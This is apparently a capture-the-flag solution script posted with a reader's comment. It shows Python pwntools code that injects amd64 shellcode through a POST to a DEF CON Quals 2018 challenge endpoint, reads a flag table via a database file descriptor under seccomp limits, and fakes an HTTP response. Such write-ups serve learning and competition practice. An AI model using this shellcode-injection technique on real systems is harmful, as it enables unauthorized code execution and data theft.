Rating: 4.0
```python
#!/usr/bin/env python2
from pwn import *
import requests
"""
* will execute our shellcode
* only read/write due to prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT)
* have to return valid HTTP response otherwise will get 500
* can query the db using fd 4
"""
context.arch = "amd64"
context.os = "linux"
host = "http://b9d6d408.quals2018.oooverflow.io/cgi-bin/"
html = """X-Powered-By: PHP/7.0.28-0ubuntu0.16.04.1\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html><body>Hello World!</body></html>"""
query = "SELECT * from flag;"
shellcode = ""
shellcode += shellcraft.echo(p16(len(query)) + "\x00\x00\x03" + query , 4)
shellcode += shellcraft.read(4, 'rsp', 200)
shellcode += shellcraft.pushstr(html)
shellcode += shellcraft.write(1, 'rsp', 500)
data = {
"shell": asm(shellcode) + "\x00"
}
resp = requests.post(host + "index.php", data=data)
print resp.text
```
--vakzz
Why do you use "shellcraft.pushstr" instead of "shellcraft.echo" for the html string so you can echo it out to STDOUT?
